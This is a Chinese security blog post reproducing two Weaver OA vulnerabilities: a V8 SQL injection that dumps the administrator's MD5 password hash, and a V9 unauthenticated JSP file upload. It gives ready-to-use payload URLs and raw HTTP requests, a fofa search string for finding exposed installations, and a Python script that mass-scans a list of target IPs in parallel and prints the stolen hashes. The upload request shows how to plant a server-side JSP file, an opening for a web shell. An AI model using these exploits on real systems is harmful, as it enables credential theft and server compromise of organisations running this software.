Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

泛微OA V8 SQL注入和泛微OAV9 前台文件上传

漏洞复现 Adminxe 4244℃ 0评论

1、泛微OA V8 SQL注入

描述

可以通过漏洞获取到系统管理员加密的(MD5)的密码值

利用(payload)

/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

利用(数据包)

GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://IP/login/Login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=abcKPQwz8VeaP9hDLT5Ix; testBanCookie=test
Connection: close

POC

# 泛微OA V8 SQL注入获取管理员(sysadmin)MD5后的密码信息
# fofa:  app="泛微-协同办公OA"

import requests
import urllib3
from  multiprocessing import Pool
urllib3.disable_warnings()

def title():
    print("[-------------------------------------------------]")
    print("[------------    泛微OA V8 SQL注入     ------------]")
    print("[--------    use:python3 weaverSQL.py     --------]")
    print("[------------     Author:Henry4E36    ------------]")
    print("[-------------------------------------------------]")


def target_url(url):
    target_url = url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager"
    headers = {
        "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36"
    }
    # 代理设置
    # proxy = "127.0.0.1:8080"
    # proxies = {
    #     'http': 'http://' + proxy,
    #     'https': 'https://' + proxy
    # }
    try:
        res = requests.get(url=target_url,headers=headers,verify=False,timeout=10)
        if res.status_code == 200:
            print(f"\033[31m[!]  目标系统: {url} 存在SQL注入!\033[0m")
            print("[-]  正在查询sysadmin密码信息.......")
            print(f"[-]  用户: sysadmin    密码MD5: \033[33m{res.text.strip()}\033[0m")
            print("[---------------------------------------------------------------------]")
        else:
            print(f"[0]  目标系统: {url} 不存在SQL注入!\033[0m")
            print("[---------------------------------------------------------------------]")
    except Exception as e:
        print(f"[0]  目标系统: {url} 存在未知错误!\n",e)
        print("[---------------------------------------------------------------------]")


if __name__ == "__main__":
    title()
    pool = Pool(processes=10)
    with open("ip.txt","r") as f:
        for url in f:
            if url[:4] != "http":
                url = "http://" + url
            url = url.strip()
            pool.apply_async(target_url, args=(url,))
    f.close()
    pool.close()
    pool.join()

2、泛微OAV9 前台文件上传

描述

fofa app=”Weaver-OA”

POC & 利用

POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: x.x.x.x
Content-Length: 216
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
Connection: close

------WebKitFormBoundaryFy3iNVBftjP6IOwo
Content-Disposition: form-data; name="file"; filename="12.jsp"
Content-Type: application/octet-stream

<%out.print(1111);%>
------WebKitFormBoundaryFy3iNVBftjP6IOwo--

然后访问

page/exportImport/fileTransfer/12.jsp

转载请注明:Adminxe's Blog » 泛微OA V8 SQL注入和泛微OAV9 前台文件上传

喜欢 (6)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址